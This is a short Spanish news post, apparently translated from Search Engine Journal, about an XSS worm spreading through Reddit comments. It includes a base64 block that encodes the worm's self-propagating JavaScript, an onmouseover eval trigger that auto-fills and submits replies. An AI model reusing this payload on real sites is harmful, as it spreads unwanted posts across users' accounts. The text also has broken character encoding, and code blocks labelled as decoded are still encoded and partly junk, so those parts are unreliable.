Ataque XSS en Reddit – Search Engine Journal

Jugando en Reddit esta noche encontré varios hilos siendo atacados por lo que parece ser un virus XSS (cross site scripting). Si va a estos hilos y ve el código que publica el script, se hará cargo de sus comentarios y respuestas para el hilo que genera el mismo código.

Lo mejor que puede hacer ahora si es usuario de Reddit es instalar No Script para Firefox.

Actualización: desde Reddit

Parecen haber convertido un código javascript en caracteres escapados html y han conseguido que el navegador lo interprete de alguna manera. Cuando abro mis mensajes recibidos, instantáneamente intenta publicar una respuesta a cada mensaje en esa página, extendiéndose así.

Editar: hubo una presentaci√≥n a la programaci√≥n hoy (creo) que ya no puedo encontrar que haya tenido un ataque similar, aunque mucho menos sofisticado. Ese se bas√≥ en que las personas fueran lo suficientemente est√ļpidas como para copiar y pegar el c√≥digo en la barra de direcciones del navegador. Supongo que alguien encontr√≥ una haza√Īa y us√≥ su idea.

Decodificar el script que est√° codificado en URL nos da esto;

[[code]]czo1Mjg6XCJbeF1bYl0NCltiXTovWw0Kej1cXFwiW3hdW2JdXFxcXG5bYl06L1tcXFwiK3RoaXMuaW5uZXJIVE1MK1xcXCJdKC9vbm1vdXNlb3ZlcntbJiomXX09ZXZhbCh1bmVzY2FwZSggICAgdGhpcy5pbm5lckhUTUwpKS8vKVxcXCI7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmF7WyYqJl19bWUoXFxcJ2FcXFwnKTsNCmZvcihpPTA7aSZsdDtlLmxlbmd0aDtpKyspaWYgKGVbaV0uaW5uZXJIVE1MPT1cXFwncmVwbHlcXFwnKSQoZVtpXSkue1smKiZdfWNsaWNrKCk7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwndGV4dGFyZWFcXFwnKTsNCmZvcihpPTA7aSZsdDtle1smKiZdfS5sZW5ndGg7aSsrKWVbaV0udmFsdWU9ejsNCmU9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwnYnV0dG9uXFxcJyk7DQpmb3IoaT0wO2kme1smKiZdfWx0O2UubGVuZ3RoO2krKykNCmlmIChlW2ldLmlubmVySFRNTD09XFxcJ3NhdmVcXFwnJmFtcDsmYW1wO2VbaV0uc3R5bGUuZGlzcGxheSE9e1smKiZdfVxcXCdub25lXFxcJykNCiQoZVtpXSkuY2xpY2soKTsNCl0oL29ubW91c2VvdmVyPWV2YWwodW5lc2NhcGUodGhpcy5pbm5lckhUTUwpKS8ve1smKiZdfSkNClwiO3tbJiomXX0=[[/code]]

Sin codificar parece;

[[code]]czo4OlwiW3hdW2JdDQpcIjt7WyYqJl19[[/code]]

Parece que el detector de spam de comentarios está eliminando la gran mayoría. Sin embargo, no se sorprenda si reddit se cae de esto.